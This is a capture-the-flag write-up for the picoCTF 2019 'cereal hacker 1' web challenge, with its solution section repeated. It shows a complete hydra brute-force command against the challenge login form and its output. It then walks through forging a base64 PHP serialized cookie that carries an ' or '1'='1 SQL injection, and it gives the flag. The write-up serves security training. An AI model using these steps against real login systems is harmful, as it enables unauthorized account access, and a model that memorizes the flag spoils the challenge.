cereal hacker 1

Problem

Login as admin. https://2019shell1.picoctf.com/problem/49879/ or http://2019shell1.picoctf.com:49879

Website

Solution

Credential bruteforcing: The credentials can be found with hydra and the http[s]-{get|post}-form module. Module help can be printed with hydra http-post-form -U. This article about using hydra on a web-based login page was somewhat helpful in this step. Final command:

 hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -F 2019shell1.picoctf.com -s 49879 http-post-form "/index.php?file=login:user=^USER^&pass=^PASS^:Invalid Login"

The user= and pass= are the post variables found from the debugging console in Firefox. See image below.

Result:

 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

 [INFORMATION] reading restore file ./hydra.restore
 [WARNING] options after -R are now honored (since v8.6)
 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-31 22:10:14
 [DATA] max 16 tasks per 1 server, overall 16 tasks, 170000 login tries (l:17/p:10000), ~10625 tries per task
 [DATA] attacking http-post-form://2019shell1.picoctf.com:49879/index.php?file=login:user=^USER^&pass=^PASS^:Invalid Login
 [STATUS] 4115.00 tries/min, 4115 tries in 00:01h, 165885 to do in 00:41h, 16 active
 [STATUS] 2981.33 tries/min, 8944 tries in 00:03h, 161056 to do in 00:55h, 16 active
 [STATUS] 2691.71 tries/min, 18842 tries in 00:07h, 151158 to do in 00:57h, 16 active
 [49879][http-post-form] host: 2019shell1.picoctf.com   login: guest   password: guest
 [STATUS] attack finished for 2019shell1.picoctf.com (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-31 22:23:17

Login as guest:guest.
Get cookie
URL and Base64Decode:
- Option 1: Use URLdecoder to decode the cookie twice then use base64decoder to decode what you get from URLdecoder to get: O:11:"permissions":2:{s:8:"username";s:5:"guest";s:8:"password";s:5:"guest";}
- Option 2: Use CyberChef with this recipe: [{"op":"URL Decode","args":[]},{"op":"URL Decode","args":[]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]}].
Change that result to O:11:"permissions":2:{s:8:"username";s:5:"admin";s:8:"password";s:11:"' or '1'='1";} (s:11 and not s:5 because the number corresponds to the length of the string which is PHP standard)
Encoding
- Option 1: Encode using base64encode to get TzoxMToicGVybWlzc2lvbnMiOjI6e3M6ODoidXNlcm5hbWUiO3M6NToiYWRtaW4iO3M6ODoicGFzc3dvcmQiO3M6MTE6Iicgb3IgJzEnPScxIjt9. If there are equal signs after the cookie is base64 encoded then run the base64 encoded string through URLencoder twice.
- Option 2: Use CyberChef with this recipe: [{"op":"To Base64","args":["A-Za-z0-9+/="]},{"op":"URL Encode","args":[true]},{"op":"URL Encode","args":[true]}].
Set cookie to new cookie
Change URL to file=admin
You got the flag

Flag

picoCTF{0d040919669d2bc1501212f90450eb4c}

PreviousEmpire2 NextEmpire3

Last updated 3 years ago

Solution

 hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -F 2019shell1.picoctf.com -s 49879 http-post-form "/index.php?file=login:user=^USER^&pass=^PASS^:Invalid Login"

The user= and pass= are the post variables found from the debugging console in Firefox. See image below.

Result:

 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

 [INFORMATION] reading restore file ./hydra.restore
 [WARNING] options after -R are now honored (since v8.6)
 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-31 22:10:14
 [DATA] max 16 tasks per 1 server, overall 16 tasks, 170000 login tries (l:17/p:10000), ~10625 tries per task
 [DATA] attacking http-post-form://2019shell1.picoctf.com:49879/index.php?file=login:user=^USER^&pass=^PASS^:Invalid Login
 [STATUS] 4115.00 tries/min, 4115 tries in 00:01h, 165885 to do in 00:41h, 16 active
 [STATUS] 2981.33 tries/min, 8944 tries in 00:03h, 161056 to do in 00:55h, 16 active
 [STATUS] 2691.71 tries/min, 18842 tries in 00:07h, 151158 to do in 00:57h, 16 active
 [49879][http-post-form] host: 2019shell1.picoctf.com   login: guest   password: guest
 [STATUS] attack finished for 2019shell1.picoctf.com (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-31 22:23:17

Get cookie

URL and Base64Decode:

Option 1: Use URLdecoder to decode the cookie twice then use base64decoder to decode what you get from URLdecoder to get: O:11:"permissions":2:{s:8:"username";s:5:"guest";s:8:"password";s:5:"guest";}
Option 2: Use CyberChef with this recipe: [{"op":"URL Decode","args":[]},{"op":"URL Decode","args":[]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]}].

Change that result to O:11:"permissions":2:{s:8:"username";s:5:"admin";s:8:"password";s:11:"' or '1'='1";} (s:11 and not s:5 because the number corresponds to the length of the string which is PHP standard)

Encoding

Option 1: Encode using base64encode to get TzoxMToicGVybWlzc2lvbnMiOjI6e3M6ODoidXNlcm5hbWUiO3M6NToiYWRtaW4iO3M6ODoicGFzc3dvcmQiO3M6MTE6Iicgb3IgJzEnPScxIjt9. If there are equal signs after the cookie is base64 encoded then run the base64 encoded string through URLencoder twice.
Option 2: Use CyberChef with this recipe: [{"op":"To Base64","args":["A-Za-z0-9+/="]},{"op":"URL Encode","args":[true]},{"op":"URL Encode","args":[true]}].

Set cookie to new cookie

Change URL to file=admin

You got the flag

Flag

picoCTF{0d040919669d2bc1501212f90450eb4c}